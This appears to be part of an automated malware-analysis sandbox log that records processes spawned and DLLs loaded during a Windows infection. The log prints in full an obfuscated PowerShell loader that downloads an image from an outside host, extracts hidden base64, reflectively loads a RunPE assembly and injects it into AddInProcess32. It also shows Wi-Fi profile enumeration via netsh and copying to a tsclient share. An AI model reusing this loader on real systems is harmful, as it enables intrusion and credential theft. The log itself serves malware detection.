          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
